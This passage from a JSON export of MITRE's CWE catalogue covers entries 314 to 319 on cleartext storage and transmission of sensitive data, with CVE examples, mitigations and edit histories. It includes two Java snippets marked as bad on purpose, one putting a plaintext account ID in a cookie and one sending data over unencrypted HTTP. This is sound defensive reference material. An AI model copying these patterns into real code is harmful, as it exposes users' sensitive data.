key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in File or on Disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in File or on Disk","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a File or on Disk","attr":{"@_Date":"2013-07-17"}}]}},"314":{"attr":{"@_ID":"314","@_Name":"Cleartext Storage in the Registry","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in the registry.","Extended_Description":"Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2227","Description":"Cleartext passwords in registry key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2227"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Registry"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Registry","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in the Registry","attr":{"@_Date":"2013-07-17"}}]}},"315":{"attr":{"@_ID":"315","@_Name":"Cleartext Storage of Sensitive Information in a Cookie","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a cookie.","Extended_Description":"Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1800","Description":"Admin password in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Cookie"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Cookie","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a Cookie","attr":{"@_Date":"2013-07-17"}}]}},"316":{"attr":{"@_ID":"316","@_Name":"Cleartext Storage of Sensitive Information in Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in memory.","Extended_Description":{"xhtml:p":["The sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the application crashes, or if the programmer does not properly clear the memory before freeing it.","It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1517","Description":"Sensitive authentication information in cleartext in memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1517"},{"Reference":"BID:10155","Description":"Sensitive authentication information in cleartext in memory.","Link":"http://www.securityfocus.com/bid/10155"},{"Reference":"CVE-2001-0984","Description":"Password protector leaves passwords in memory when window is minimized, even when \\"clear password when minimized\\" is set.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0984"},{"Reference":"CVE-2003-0291","Description":"SSH client does not clear credentials from memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":[{"#text":"This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory.","attr":{"@_Type":"Relationship"}},{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Memory","attr":{"@_Date":"2013-07-17"}}}},"317":{"attr":{"@_ID":"317","@_Name":"Cleartext Storage of Sensitive Information in GUI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within the GUI.","Extended_Description":"An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1848","Description":"Unencrypted passwords stored in GUI dialog may allow local users to access the passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1848"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in GUI"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in GUI","attr":{"@_Date":"2013-07-17"}}}},"318":{"attr":{"@_ID":"318","@_Name":"Cleartext Storage of Sensitive Information in Executable","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in an executable.","Extended_Description":"Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1794","Description":"Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1794"},{"Reference":"CVE-2001-1527","Description":"administration passwords in cleartext in executable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Executable"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"65"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage in Executable","attr":{"@_Date":"2013-07-17"}}}},"319":{"attr":{"@_ID":"319","@_Name":"Cleartext Transmission of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.","Extended_Description":"Many communication channels can be \\"sniffed\\" by attackers during data transmission. For example, network traffic can often be sniffed by any attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Files or Directories"],"Note":"Anyone can read the information by gaining access to the channel being used for communication."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process, trigger the feature that sends the data, and look for the presence or absence of common cryptographic functions in the call tree. Monitor the network and determine if the data packets contain readable commands. Tools exist for detecting if certain encodings are in use. If the traffic contains high entropy, this might indicate the usage of encryption."]}}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Encrypt the data with a reliable encryption scheme before transmitting."},{"Phase":"Implementation","Description":"When using web applications with SSL, use SSL for the entire session from login to logout, not just for the initial login page."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Phase":"Operation","Description":"Configure servers to use encrypted channels for communication, which may include SSL or other secure protocols."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Transmission of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER02-J","Entry_Name":"Sign then seal sensitive objects before sending them outside a trust boundary"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"117"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-271"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "Protecting Secret Data" Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 22: Failing to Protect Network Traffic." Page 337"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 